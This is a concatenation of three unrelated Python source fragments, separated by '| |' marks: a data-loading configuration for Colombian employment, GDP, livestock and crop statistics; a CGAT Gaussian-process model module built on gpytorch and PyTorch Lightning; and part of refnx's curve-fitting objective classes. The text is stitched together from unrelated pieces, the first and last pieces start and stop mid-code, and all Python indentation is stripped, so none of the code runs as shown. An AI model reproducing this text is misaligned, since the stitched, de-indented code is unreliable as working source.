"level": "municipality"
},
"industry": {
"classification": industry_classification,
"level": "class"
},
},
"digit_padding": {
"location": 5,
"industry": 4
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("location_id", "industry_id", "year"): {
"employment": first,
"wages": first,
"monthly_wages": first,
"num_establishments": first,
}
}
}
population = {
"read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_pop_muni_dept_natl.dta")),
"hook_pre_merge": lambda df: df[~df[["location", "year", "population"]].duplicated()],
"field_mapping": {
"year": "year",
"dept_code": "location",
"dept_pop": "population"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "department"
},
},
"digit_padding": {
"location": 2
},
"facet_fields": ["location", "year"],
"facets": {
("location_id", "year"): {
"population": first
}
}
}
gdp_nominal_department = {
"read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_nomgdp_muni_dept_natl.dta")),
"hook_pre_merge": lambda df: df.drop_duplicates(["location", "year"]),
"field_mapping": {
"dept_code": "location",
"dept_gdp": "gdp_nominal",
"year": "year"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "department"
},
},
"digit_padding": {
"location": 2
},
"facet_fields": ["location", "year"],
"facets": {
("location_id", "year"): {
"gdp_nominal": first,
}
}
}
gdp_real_department = {
"read_function": lambda: pd.read_stata(prefix_path("Final_Metadata/col_realgdp_dept_natl.dta")),
"field_mapping": {
"dept_code": "location",
"real_gdp": "gdp_real",
"year": "year"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "department"
},
},
"digit_padding": {
"location": 2
},
"facet_fields": ["location", "year"],
"facets": {
("location_id", "year"): {
"gdp_real": first,
}
}
}
def industry2digit_country_read():
df = pd.read_hdf(prefix_path("Industries/industries_all.hdf"), "data")
df["country_code"] = "COL"
return df
industry2digit_country = {
"read_function": industry2digit_country_read,
"hook_pre_merge": hook_industry,
"field_mapping": {
"country_code": "location",
"d3_code": "industry",
"year": "year",
"all_d3_wage": "wages",
"all_d3_wagemonth": "monthly_wages",
"all_d3_emp": "employment",
"all_d3_est": "num_establishments",
"all_d3_pci": "complexity"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "country"
},
"industry": {
"classification": industry_classification,
"level": "division"
},
},
"digit_padding": {
"location": 1,
"industry": 2
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("industry_id", "year"): {
"wages": first,
"monthly_wages": first,
"employment": first,
"num_establishments": first,
"complexity": first
}
}
}
industry2digit_department = {
"read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_state.hdf"), "data"),
"hook_pre_merge": hook_industry,
"field_mapping": {
"state_code": "location",
"d3_code": "industry",
"year": "year",
"state_d3_est": "num_establishments",
"state_d3_wage": "wages",
"state_d3_wagemonth": "monthly_wages",
"state_d3_emp": "employment",
"state_d3_rca": "rca",
"state_d3_distance_flow_pred": "distance",
"state_d3_cog_flow_pred": "cog",
"all_d3_pci": "complexity"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "department"
},
"industry": {
"classification": industry_classification,
"level": "division"
},
},
"digit_padding": {
"location": 2,
"industry": 2
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("location_id", "industry_id", "year"): {
"wages": first,
"monthly_wages": first,
"employment": first,
"num_establishments": first,
"distance": first,
"cog": first,
"rca": first
}
}
}
def hook_industry2digit_msa(df):
df = hook_industry(df)
df.location = df.location.astype(int).astype(str).str.zfill(5) + "0"
return df
industry2digit_msa = {
"read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_msa.hdf"), "data"),
"hook_pre_merge": hook_industry2digit_msa,
"field_mapping": {
"msa_code": "location",
"d3_code": "industry",
"year": "year",
"msa_d3_est": "num_establishments",
"msa_d3_wage": "wages",
"msa_d3_wagemonth": "monthly_wages",
"msa_d3_emp": "employment",
"msa_d3_rca": "rca",
"msa_d3_distance_flow_pred": "distance",
"msa_d3_cog_flow_pred": "cog",
"all_d3_pci": "complexity"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "msa"
},
"industry": {
"classification": industry_classification,
"level": "division"
},
},
"digit_padding": {
"industry": 2,
"location": 5
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("industry_id", "year"): {
"wages": sum_group,
"monthly_wages": sum_group,
"employment": sum_group,
"num_establishments": sum_group,
"complexity": first
},
("location_id", "industry_id", "year"): {
"wages": first,
"monthly_wages": first,
"employment": first,
"num_establishments": first,
"distance": first,
"cog": first,
"rca": first
}
}
}
occupation2digit_industry2digit = {
"read_function": lambda: pd.read_stata(prefix_path("Vacancies/Vacancies_do130_2d-Ind_X_4d-Occ.dta")),
"field_mapping": {
"onet_4dig": "occupation",
"ciiu_2dig": "industry",
"num_vacantes": "num_vacancies",
"wage_mean": "average_wages"
},
"classification_fields": {
"occupation": {
"classification": occupation_classification,
"level": "minor_group"
},
"industry": {
"classification": industry_classification,
"level": "division"
},
},
"digit_padding": {
"occupation": 7,
"industry": 4
},
"facet_fields": ["occupation", "industry"],
"facets": {
("occupation_id", "industry_id"): {
"average_wages": first,
"num_vacancies": first,
}
}
}
occupation2digit = {
"read_function": lambda: pd.read_stata(prefix_path("Vacancies/Vacancies_do140_4d-Occ.dta")),
"field_mapping": {
"onet_4dig": "occupation",
"num_vacantes": "num_vacancies",
"wage_mean": "average_wages"
},
"classification_fields": {
"occupation": {
"classification": occupation_classification,
"level": "minor_group"
},
},
"digit_padding": {
"occupation": 7,
},
"facet_fields": ["occupation"],
"facets": {
("occupation_id"): {
"average_wages": first,
"num_vacancies": first,
}
}
}
livestock_template = {
"read_function": None,
"field_mapping": {
"livestock": "livestock",
"location_id": "location",
"livestock_level": "livestock_level",
"livestock_number": "num_livestock",
"livestock_farms_number": "num_farms",
"average_livestock_load": "average_livestock_load",
},
"classification_fields": {
"livestock": {
"classification": livestock_classification,
"level": "level1",
},
"location": {
"classification": location_classification,
"level": None,
},
},
"digit_padding": {
"location": None,
},
"facet_fields": ["location", "livestock"],
"facets": {
("location_id", "livestock_id"): {
"num_livestock": first,
"num_farms": first,
"average_livestock_load": first,
},
("location_id",): {
"num_livestock": sum_group,
"num_farms": sum_group,
"average_livestock_load": null,
}
}
}
def read_livestock_level1_country():
df = pd.read_stata(prefix_path("Rural/livestock_Col_2.dta"))
df["location_id"] = "COL"
return df
def hook_livestock(df):
df["livestock"] = df["livestock"].str.lower()
df = df[df.livestock_level == "level1"]
return df
livestock_level1_country = copy.deepcopy(livestock_template)
livestock_level1_country["read_function"] = read_livestock_level1_country
livestock_level1_country["hook_pre_merge"] = hook_livestock
livestock_level1_country["classification_fields"]["location"]["level"] = "country"
livestock_level1_country["digit_padding"]["location"] = 3
livestock_level1_department = copy.deepcopy(livestock_template)
livestock_level1_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/livestock_dept_2.dta"))
livestock_level1_department["hook_pre_merge"] = hook_livestock
livestock_level1_department["classification_fields"]["location"]["level"] = "department"
livestock_level1_department["digit_padding"]["location"] = 2
livestock_level1_municipality = copy.deepcopy(livestock_template)
livestock_level1_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/livestock_muni_2.dta"))
livestock_level1_municipality["hook_pre_merge"] = hook_livestock
livestock_level1_municipality["classification_fields"]["location"]["level"] = "municipality"
livestock_level1_municipality["digit_padding"]["location"] = 5
agproduct_template = {
"read_function": None,
"field_mapping": {
"location_id": "location",
"product_name_sp": "agproduct",
"product_level": "agproduct_level",
"year": "year",
"land_sown_has": "land_sown",
"land_harv_has": "land_harvested",
"production_tons": "production_tons",
"yieldtonsperha": "yield_ratio",
"indexyield": "yield_index",
},
"classification_fields": {
"agproduct": {
"classification": agproduct_classification,
"level": "level3",
},
"location": {
"classification": location_classification,
"level": None,
},
},
"digit_padding": {
"location": None,
},
"facet_fields": ["location", "agproduct", "year"],
"facets": {
("location_id", "agproduct_id", "year"): {
"land_sown": first,
"land_harvested": first,
"production_tons": first,
"yield_ratio": first,
"yield_index": first,
}
}
}
def read_agproduct_level3_country():
df = pd.read_stata(prefix_path("Rural/agric_2007_2015_Col_final_2.dta"))
df["location_id"] = "COL"
return df
def hook_agproduct(df):
df["agproduct"] = df["agproduct"].map(slugify)
df = df[df.agproduct_level == "level3"]
df = df[df.year != ""]
df.year = df.year.astype(int)
df = df[df.year.between(YEAR_MIN_AGPRODUCT, YEAR_MAX_AGPRODUCT)]
return df
agproduct_level3_country = copy.deepcopy(agproduct_template)
agproduct_level3_country["read_function"] = read_agproduct_level3_country
agproduct_level3_country["hook_pre_merge"] = hook_agproduct
agproduct_level3_country["classification_fields"]["location"]["level"] = "country"
agproduct_level3_country["digit_padding"]["location"] = 3
agproduct_level3_department = copy.deepcopy(agproduct_template)
agproduct_level3_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/agric_2007_2015_dept_final_2.dta"))
agproduct_level3_department["hook_pre_merge"] = hook_agproduct
agproduct_level3_department["classification_fields"]["location"]["level"] = "department"
agproduct_level3_department["digit_padding"]["location"] = 2
agproduct_level3_municipality = copy.deepcopy(agproduct_template)
agproduct_level3_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/agric_2007_2015_muni_final_2.dta"))
agproduct_level3_municipality["hook_pre_merge"] = hook_agproduct
agproduct_level3_municipality["classification_fields"]["location"]["level"] = "municipality"
agproduct_level3_municipality["digit_padding"]["location"] = 3
def hook_land_use(df):
df = df[df.land_use_level == "level2"]
df["land_use"] = df["land_use"].str.replace('\x92', 'Â’')
return df
land_use_template = {
"read_function": None,
"hook_pre_merge": hook_land_use,
"field_mapping": {
"location_id": "location",
"land_use_type_name_sp": "land_use",
"land_use_level": "land_use_level",
"land_use_ha": "area",
},
"classification_fields": {
"land_use": {
"classification": land_use_classification,
"level": "level2",
},
"location": {
"classification": location_classification,
"level": None,
},
},
"digit_padding": {
"location": None,
},
"facet_fields": ["location", "land_use"],
"facets": {
("location_id", "land_use_id"): {
"area": first,
}
}
}
def read_land_use_level2_country():
df = pd.read_stata(prefix_path("Rural/land_use_Col_c.dta"))
df["location_id"] = "COL"
return df
land_use_level2_country = copy.deepcopy(land_use_template)
land_use_level2_country["read_function"] = read_land_use_level2_country
land_use_level2_country["classification_fields"]["location"]["level"] = "country"
land_use_level2_country["digit_padding"]["location"] = 3
land_use_level2_department = copy.deepcopy(land_use_template)
land_use_level2_department["read_function"] = lambda: pd.read_stata(prefix_path("Rural/land_use_dept_c.dta"))
land_use_level2_department["classification_fields"]["location"]["level"] = "department"
land_use_level2_department["digit_padding"]["location"] = 2
land_use_level2_municipality = copy.deepcopy(land_use_template)
land_use_level2_municipality["read_function"] = lambda: pd.read_stata(prefix_path("Rural/land_use_muni_c.dta"))
land_use_level2_municipality["hook_pre_merge"] = hook_land_use
land_use_level2_municipality["classification_fields"]["location"]["level"] = "municipality"
land_use_level2_municipality["digit_padding"]["location"] = 5
def hook_farmtype(df):
df = df[df.farmtype_level == "level2"]
return df
farmtype_template = {
"read_function": None,
"hook_pre_merge": hook_farmtype,
"field_mapping": {
"location_id": "location",
"farms_types_name": "farmtype",
"farms_level": "farmtype_level",
| |
<reponame>noah-hoffmann/CGAT<filename>CGAT/gaussian_process.py
import gpytorch
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
from torch.nn.functional import l1_loss as mae
from torch.nn.functional import mse_loss as mse
from .lightning_module import LightningModel, collate_fn, collate_batch
from pytorch_lightning.core import LightningModule
from torch_geometric.data import Batch
from .data import CompositionData
from .utils import cyclical_lr
from glob import glob
import os
from argparse import ArgumentParser
import datetime
import itertools
from sklearn.model_selection import train_test_split as split
from pytorch_lightning import Trainer
from pytorch_lightning.loggers.tensorboard import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
import pickle
import gzip as gz
def EmbeddingData(data, target='e_above_hull_new'):
if isinstance(data, str):
data = pickle.load(gz.open(data))
else:
data = data
input = torch.Tensor(data['input'])
target = torch.Tensor(data['target'][target])
return TensorDataset(input, target)
class GPModel(gpytorch.models.ApproximateGP):
def __init__(self, inducing_points: torch.Tensor, *,
mean_module=gpytorch.means.ConstantMean,
covar_module=gpytorch.kernels.RBFKernel):
# init base class
distribution = gpytorch.variational.CholeskyVariationalDistribution(inducing_points.size(0))
strategy = gpytorch.variational.VariationalStrategy(self, inducing_points, distribution)
super(GPModel, self).__init__(strategy)
# init mean and covariance modules
self.mean_module = mean_module()
self.covar_module = gpytorch.kernels.ScaleKernel(covar_module())
# init likelihood
self.likelihood = gpytorch.likelihoods.GaussianLikelihood()
def forward(self, batch):
# calculate means and covariances of the batch
mean = self.mean_module(batch)
covar = self.covar_module(batch)
# return distribution
return gpytorch.distributions.MultivariateNormal(mean, covar)
def parameters(self, recurse: bool = True):
return itertools.chain(super().parameters(recurse),
self.likelihood.parameters(recurse))
class GLightningModel(LightningModule):
def __init__(self, hparams):
super().__init__()
# initialization of mean and standard deviation of the target data (needed for reloading without recalculation)
self.mean = nn.parameter.Parameter(torch.zeros(1), requires_grad=False)
self.std = nn.parameter.Parameter(torch.zeros(1), requires_grad=False)
self.save_hyperparameters(hparams)
# loading of cgat model (needed for calculating the embeddings)
if self.hparams.cgat_model is not None:
self.cgat_model = LightningModel.load_from_checkpoint(self.hparams.cgat_model, train=False)
self.cgat_model.eval()
self.cgat_model.cuda()
# prepare tensor for inducing points
embedding_dim = self.cgat_model.hparams.atom_fea_len * self.cgat_model.hparams.msg_heads
self.hparams.embedding_dim = embedding_dim
else:
self.cgat_model = None
# datasets are loaded for training or testing not needed in production
if self.hparams.train:
datasets = []
if self.cgat_model is not None:
# used for single file
try:
dataset = CompositionData(
data=self.hparams.data_path,
fea_path=self.hparams.fea_path,
max_neighbor_number=self.hparams.max_nbr,
target=self.hparams.target)
print(self.hparams.data_path + ' loaded')
# used for folder of dataset files
except AssertionError:
f_n = sorted([file for file in glob(os.path.join(self.hparams.data_path, "*.pickle.gz"))])
print("{} files to load".format(len(f_n)))
for file in f_n:
try:
datasets.append(CompositionData(
data=file,
fea_path=self.hparams.fea_path,
max_neighbor_number=self.hparams.max_nbr,
target=self.hparams.target))
print(file + ' loaded')
except AssertionError:
print(file + ' could not be loaded')
print("{} files succesfully loaded".format(len(datasets)))
dataset = torch.utils.data.ConcatDataset(datasets)
else:
if os.path.isfile(self.hparams.data_path):
dataset = EmbeddingData(
data=self.hparams.data_path,
target=self.hparams.target
)
print(self.hparams.data_path + ' loaded')
elif os.path.isdir(self.hparams.data_path):
dataset = torch.utils.data.ConcatDataset([
EmbeddingData(
data=file,
target=self.hparams.target
)
for file in glob(os.path.join(self.hparams.data_path, '*.pickle.gz'))])
else:
raise ValueError(f"{self.hparams.data_path!r} is neither a file nor an existing directory!")
self.hparams.embedding_dim = len(dataset[0][0])
if self.hparams.test_path is None or self.hparams.val_path is None:
indices = list(range(len(dataset)))
train_idx, test_idx = split(indices, random_state=self.hparams.seed,
test_size=self.hparams.test_size)
train_set = torch.utils.data.Subset(dataset, train_idx)
self.test_set = torch.utils.data.Subset(dataset, test_idx)
indices = list(range(len(train_set)))
train_idx, val_idx = split(indices, random_state=self.hparams.seed,
test_size=self.hparams.val_size / (1 - self.hparams.test_size))
train_set_2 = torch.utils.data.Subset(train_set, train_idx)
self.val_subset = torch.utils.data.Subset(train_set, val_idx)
else:
if self.cgat_model is not None:
test_data = torch.utils.data.ConcatDataset([CompositionData(data=file,
fea_path=self.hparams.fea_path,
max_neighbor_number=self.hparams.max_nbr,
target=self.hparams.target)
for file in glob(
os.path.join(self.hparams.test_path, "*.pickle.gz"))])
val_data = torch.utils.data.ConcatDataset([CompositionData(data=file,
fea_path=self.hparams.fea_path,
max_neighbor_number=self.hparams.max_nbr,
target=self.hparams.target)
for file in glob(
os.path.join(self.hparams.val_path, "*.pickle.gz"))])
else:
test_data = torch.utils.data.ConcatDataset([EmbeddingData(data=file,
target=self.hparams.target)
for file in glob(
os.path.join(self.hparams.test_path, '*.pickle.gz'))])
val_data = torch.utils.data.ConcatDataset([EmbeddingData(data=file,
target=self.hparams.target)
for file in glob(
os.path.join(self.hparams.val_path, '*.pickle.gz'))])
train_set = dataset
self.test_set = test_data
train_set_2 = train_set
self.val_subset = val_data
# Use train_percentage to get errors for different training set sizes
# but same test and validation sets
if self.hparams.train_percentage != 0.0:
indices = list(range(len(train_set_2)))
train_idx, rest_idx = split(
indices, random_state=self.hparams.seed, test_size=1.0 - self.hparams.train_percentage / (
1 - self.hparams.val_size - self.hparams.test_size))
self.train_subset = torch.utils.data.Subset(train_set_2, train_idx)
else:
self.train_subset = train_set_2
self.hparams.train_size = len(self.train_subset)
print('Normalization started')
if self.cgat_model is not None:
def collate_fn2(data_list):
return [el[0].y for el in data_list]
else:
def collate_fn2(data_list):
return [y for x, y in data_list]
sample_target = torch.cat(collate_fn2(self.train_subset))
self.mean = nn.parameter.Parameter(torch.mean(sample_target, dim=0, keepdim=False).reshape((-1,)),
requires_grad=False)
self.std = nn.parameter.Parameter(torch.std(sample_target, dim=0, keepdim=False).reshape((-1,)),
requires_grad=False)
print('mean: ', self.mean.item(), 'std: ', self.std.item())
print('normalization ended')
# getting inducing_points
self.inducing_points = nn.parameter.Parameter(torch.zeros((self.hparams.inducing_points,
self.hparams.embedding_dim)),
requires_grad=False)
if self.hparams.train:
if self.cgat_model is not None:
print('Calculating embedding of inducing points')
loader = DataLoader(self.train_subset, batch_size=self.hparams.inducing_points, shuffle=True,
collate_fn=collate_fn)
batch = next(iter(loader))
del loader
with torch.no_grad():
self.inducing_points = nn.parameter.Parameter(
self.cgat_model.evaluate(batch, return_graph_embedding=True), requires_grad=False)
else:
loader = DataLoader(self.train_subset, batch_size=self.hparams.inducing_points, shuffle=True)
inducing_points, _ = next(iter(loader))
del loader
self.inducing_points = nn.parameter.Parameter(inducing_points, requires_grad=False)
print('Done')
if self.hparams.zero_mean:
self.model = GPModel(self.inducing_points, mean_module=gpytorch.means.ZeroMean)
else:
self.model = GPModel(self.inducing_points)
# only init loss function for training
self.criterion = gpytorch.mlls.VariationalELBO(self.model.likelihood, self.model, self.hparams.train_size)
def norm(self, tensor):
"""
normalizes tensor
"""
return (tensor - self.mean) / self.std
def denorm(self, normed_tensor):
"""
return normalized tensor to original form
"""
return normed_tensor * self.std + self.mean
def evaluate(self, batch):
if self.cgat_model is not None:
with torch.no_grad():
embeddings = self.cgat_model.evaluate(batch, return_graph_embedding=True)
device = next(self.model.parameters()).device
b_comp, batch = [el[1] for el in batch], [el[0] for el in batch]
batch = (Batch.from_data_list(batch)).to(device)
target = batch.y.view(len(batch.y), 1)
else:
if isinstance(batch, list):
embeddings, target = batch
else:
embeddings = batch
target = torch.zeros(embeddings.shape[0])
target_norm = self.norm(target)
output = self.model(embeddings)
pred = self.denorm(output.mean)
lower, upper = output.confidence_region()
return output, (self.denorm(lower), self.denorm(upper)), pred, target.flatten(), target_norm.flatten()
def forward(self, batch):
_, _, pred, _, _ = self.evaluate(batch)
return pred
def training_step(self, batch, batch_idx):
output, _, pred, target, target_norm = self.evaluate(batch)
loss = -self.criterion(output, target_norm)
mae_error = mae(pred, target)
rmse_error = mse(pred, target).sqrt_()
self.log('train_loss',
loss,
on_step=False,
on_epoch=True,
sync_dist=True)
self.log('train_mae',
mae_error,
on_step=False,
on_epoch=True,
sync_dist=True)
self.log('train_rmse',
rmse_error,
on_step=False,
on_epoch=True,
sync_dist=True)
return loss
def validation_step(self, batch, batch_idx):
"""
Calculates various error metrics for validation
Args:
batch: Tuple of graph object from pytorch geometric and input for Roost
batch_idx: identifiers of batch elements
Returns:
"""
output, _, pred, target, target_norm = self.evaluate(batch)
val_loss = -self.criterion(output, target_norm)
val_mae = mae(pred, target)
val_rmse = mse(pred, target).sqrt_()
self.log('val_loss', val_loss, on_epoch=True, sync_dist=True)
self.log('val_mae', val_mae, on_epoch=True, sync_dist=True)
self.log('val_rmse', val_rmse, on_epoch=True, sync_dist=True)
def test_step(self, batch, batch_idx):
"""
Calculates various error metrics for testing
Args:
batch: Tuple of graph object from pytorch geometric and input for Roost
batch_idx: identifiers of batch elements
Returns:
"""
output, _, pred, target, target_norm = self.evaluate(batch)
test_loss = -self.criterion(output, target_norm)
test_mae = mae(pred, target)
test_rmse = mse(pred, target).sqrt_()
self.log('test_loss', test_loss, on_epoch=True, sync_dist=True)
self.log('test_mae', test_mae, on_epoch=True, sync_dist=True)
self.log('test_rmse', test_rmse, on_epoch=True, sync_dist=True)
def configure_optimizers(self):
"""
Creates optimizers for training according to the hyperparameter settings
Args:
Returns:
[optimizer], [scheduler]: Tuple of list of optimizers and list of learning rate schedulers
"""
# Select parameters, which should be trained
parameters = self.parameters()
# Select Optimiser
if self.hparams.optim == "SGD":
optimizer = optim.SGD(parameters,
lr=self.hparams.learning_rate,
weight_decay=self.hparams.weight_decay,
momentum=self.hparams.momentum)
elif self.hparams.optim == "Adam":
optimizer = optim.Adam(parameters,
lr=self.hparams.learning_rate,
weight_decay=self.hparams.weight_decay)
elif self.hparams.optim == "AdamW":
optimizer = optim.AdamW(parameters,
lr=self.hparams.learning_rate,
weight_decay=self.hparams.weight_decay)
else:
raise NameError(
"Only SGD, Adam, AdamW are allowed as --optim")
if self.hparams.clr:
clr = cyclical_lr(period=self.hparams.clr_period,
cycle_mul=0.1,
tune_mul=0.05, )
scheduler = optim.lr_scheduler.LambdaLR(optimizer, [clr])
else:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,
mode='min',
factor=0.1,
patience=5,
verbose=False,
threshold=0.0002,
threshold_mode='rel',
cooldown=0,
eps=1e-08)
return [optimizer], [scheduler]
def train_dataloader(self):
"""
creates dataloader for training according to the hyperparameters
Args:
Returns:
train_generator: Dataloader for training dataset
"""
params = {"batch_size": self.hparams.batch_size,
"num_workers": self.hparams.workers,
"pin_memory": False,
"shuffle": True,
"drop_last": True
}
print('length of train_subset: {}'.format(len(self.train_subset)))
train_generator = DataLoader(
self.train_subset, collate_fn=collate_fn if self.cgat_model is not None else None, **params)
return train_generator
def val_dataloader(self):
"""
creates dataloader for validation according to the hyperparameters
Args:
Returns:
val_generator: Dataloader for validation dataset
"""
params = {"batch_size": self.hparams.batch_size,
# "num_workers": self.hparams.workers,
"pin_memory": False,
"drop_last": True,
"shuffle": False}
val_generator = DataLoader(
self.val_subset,
collate_fn=collate_fn if self.cgat_model is not None else None,
**params)
print('length of val_subset: {}'.format(len(self.val_subset)))
return val_generator
def test_dataloader(self):
"""
creates dataloader for testing according to the hyperparameters
Args:
Returns:
test_generator: Dataloader for testing dataset
"""
params = {"batch_size": self.hparams.batch_size,
# "num_workers": self.hparams.workers,
"pin_memory": False,
"drop_last": True,
"shuffle": False}
test_generator = DataLoader(
self.test_set,
collate_fn=collate_fn if self.cgat_model is not None else None,
**params)
print('length of test_subset: {}'.format(len(self.test_set)))
return test_generator
@staticmethod
def add_model_specific_args(parent_parser: ArgumentParser = None) -> ArgumentParser: # pragma: no-cover
"""
Parameters defined here will be available through self.hparams
Args:
parent_parser: ArgumentParser from e.g. the training script that adds gpu settings and Trainer settings
Returns:
parser: ArgumentParser for all hyperparameters and training/test settings
"""
if parent_parser is not None:
parser = ArgumentParser(parents=[parent_parser])
else:
parser = ArgumentParser()
parser.add_argument("--data-path",
type=str,
default="data/",
metavar="PATH",
help="path to folder/file that contains dataset files, tries to load all "
"*.pickle.gz in folder")
parser.add_argument("--fea-path",
type=str,
default="../embeddings/matscholar-embedding.json",
metavar="PATH",
help="atom feature path")
parser.add_argument("--max-nbr",
default=24,
type=int,
metavar="max_N",
help="num of neighbors maximum depends on the number | |
lw=0,
elinewidth=2,
)
else:
ax.scatter(self.data.x, y, color="blue", s=3, label=self.data.name)
if samples > 0:
saved_params = np.array(self.parameters)
# Get a number of chains, chosen randomly, set the objective,
# and plot the model.
for pvec in self.pgen(ngen=samples):
y, y_err, model = self._data_transform(
model=self.generative(pvec)
)
ax.plot(self.data.x, model, color="k", alpha=0.01)
# put back saved_params
self.setp(saved_params)
# add the fit
generative_plot = ax.plot(self.data.x, model, color="red", zorder=20)
if parameter is None:
return fig, ax
# create an interactive plot in a Jupyter notebook.
def f(val):
if parameter is not None:
parameter.value = float(val)
y, y_err, model = self._data_transform(model=self.generative())
generative_plot[0].set_data(self.data.x, model)
fig.canvas.draw()
import ipywidgets
return fig, ax, ipywidgets.interact(f, val=float(parameter))
def corner(self, **kwds):
"""
Corner plot of the chains belonging to the Parameters.
Requires the `corner` and `matplotlib` packages.
Parameters
----------
kwds: dict
passed directly to the `corner.corner` function
Returns
-------
fig : :class:`matplotlib.Figure` object.
"""
import corner
var_pars = self.varying_parameters()
chain = np.array([par.chain for par in var_pars])
labels = [par.name for par in var_pars]
chain = chain.reshape(len(chain), -1).T
kwds["labels"] = labels
kwds["quantiles"] = [0.16, 0.5, 0.84]
return corner.corner(chain, **kwds)
class GlobalObjective(Objective):
"""
Global Objective function for simultaneous fitting with
`refnx.analysis.CurveFitter`
Parameters
----------
objectives : list
list of :class:`refnx.analysis.Objective` objects
"""
def __init__(self, objectives):
self.objectives = objectives
weighted = [objective.weighted for objective in objectives]
self._weighted = np.array(weighted, dtype=bool)
if len(np.unique(self._weighted)) > 1:
raise ValueError(
"All the objectives must be either weighted or"
" unweighted, you cannot have a mixture."
)
def __str__(self):
s = ["{:_>80}".format("\n")]
s.append("--Global Objective--")
for obj in self.objectives:
s.append(str(obj))
s.append("\n")
return "\n".join(s)
def __repr__(self):
return "GlobalObjective({0})".format(repr(self.objectives))
@property
def weighted(self):
"""
**bool** do all the datasets have y_err, and are all the objectives
wanting to use weights?
"""
return self._weighted.all()
@property
def npoints(self):
"""
**int** number of data points in all the objectives.
"""
npoints = 0
for objective in self.objectives:
npoints += objective.npoints
return npoints
def residuals(self, pvals=None):
"""
Concatenated residuals for each of the
:meth:`refnx.analysis.Objective.residuals`.
Parameters
----------
pvals : array-like or refnx.analysis.Parameters
values for the varying or entire set of parameters
Returns
-------
residuals : np.ndarray
Concatenated :meth:`refnx.analysis.Objective.residuals`
"""
self.setp(pvals)
residuals = []
for objective in self.objectives:
residual = objective.residuals()
residuals.append(residual)
return np.concatenate(residuals)
@property
def parameters(self):
"""
:class:`refnx.analysis.Parameters` associated with all the objectives.
"""
# TODO this is probably going to be slow.
# cache and update strategy?
p = Parameters(name="global fitting parameters")
for objective in self.objectives:
p.append(objective.parameters)
return p
def logp(self, pvals=None):
"""
Calculate the log-prior of the system
Parameters
----------
pvals : array-like or refnx.analysis.Parameters, optional
values for the varying or entire set of parameters
Returns
-------
logp : float
log-prior probability
"""
self.setp(pvals)
logp = 0.0
for objective in self.objectives:
logp += objective.logp()
# shortcut if one of the priors is impossible
if not np.isfinite(logp):
return -np.inf
return logp
def logl(self, pvals=None):
"""
Calculate the log-likelhood of the system
Parameters
----------
pvals : array-like or refnx.analysis.Parameters
values for the varying or entire set of parameters
Returns
-------
logl : float
log-likelihood probability
"""
self.setp(pvals)
logl = 0.0
for objective in self.objectives:
logl += objective.logl()
return logl
def plot(self, pvals=None, samples=0, parameter=None, fig=None):
"""
Plot the data/model for all the objectives in the GlobalObjective.
Matplotlib must be installed to use this method.
Parameters
----------
pvals : np.ndarray, optional
Numeric values for the Parameter's that are varying
samples: number, optional
If the objective has been sampled, how many samples you wish to
plot on the graph.
parameter: refnx.analysis.Parameter, optional
Creates an interactive plot for the Parameter in Jupyter. Requires
ipywidgets be installed. Use with %matplotlib notebook/qt.
fig: Figure instance, optional
If `fig` is not supplied then a new figure is created. Otherwise
the graph is created on the current axes on the supplied figure.
Returns
-------
fig, ax : :class:`matplotlib.Figure`, :class:`matplotlib.Axes`
`matplotlib` figure and axes objects.
"""
self.setp(pvals)
if fig is None:
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111)
else:
ax = fig.gca()
generative_plots = []
if samples > 0:
saved_params = np.array(self.parameters)
# Get a number of chains, chosen randomly, set the objectives,
# and plot the model.
for pvec in self.pgen(ngen=samples):
self.setp(pvec)
for objective in self.objectives:
y, y_err, model = objective._data_transform(
model=objective.generative()
)
ax.plot(objective.data.x, model, color="k", alpha=0.01)
# put back saved_params
self.setp(saved_params)
for objective in self.objectives:
# add the data (in a transformed fashion)
y, y_err, model = objective._data_transform(
model=objective.generative()
)
if objective.weighted:
ax.errorbar(
objective.data.x,
y,
y_err,
label=objective.data.name,
ms=3,
lw=0,
elinewidth=2,
marker="o",
)
else:
ax.scatter(objective.data.x, y, label=objective.data.name)
# add the fit
generative_plots.append(
ax.plot(objective.data.x, model, color="r", lw=1.5, zorder=20)[
0
]
)
if parameter is None:
return fig, ax
# create an interactive plot in a Jupyter notebook.
def f(val):
if parameter is not None:
parameter.value = float(val)
for i, objective in enumerate(self.objectives):
y, y_err, model = objective._data_transform(
model=objective.generative()
)
generative_plots[i].set_data(objective.data.x, model)
fig.canvas.draw()
import ipywidgets
return fig, ax, ipywidgets.interact(f, val=float(parameter))
return fig, ax
class Transform:
r"""
Mathematical transforms of numeric data.
Parameters
----------
form : None or str
One of:
- 'lin'
No transform is made
- 'logY'
log10 transform
- 'YX4'
YX**4 transform
- 'YX2'
YX**2 transform
- None
No transform is made
Notes
-----
You ask for a transform to be carried out by calling the Transform object
directly.
>>> x = np.linspace(0.01, 0.1, 11)
>>> y = np.linspace(100, 1000, 11)
>>> y_err = np.sqrt(y)
>>> t = Transform('logY')
>>> ty, te = t(x, y, y_err)
>>> ty
array([2. , 2.2787536 , 2.44715803, 2.56820172, 2.66275783,
2.74036269, 2.80617997, 2.86332286, 2.91381385, 2.95904139,
3. ])
"""
def __init__(self, form):
types = [None, "lin", "logY", "YX4", "YX2"]
self.form = None
if form in types:
self.form = form
else:
raise ValueError(
"The form parameter must be one of [None, 'lin',"
" 'logY', 'YX4', 'YX2']"
)
def __repr__(self):
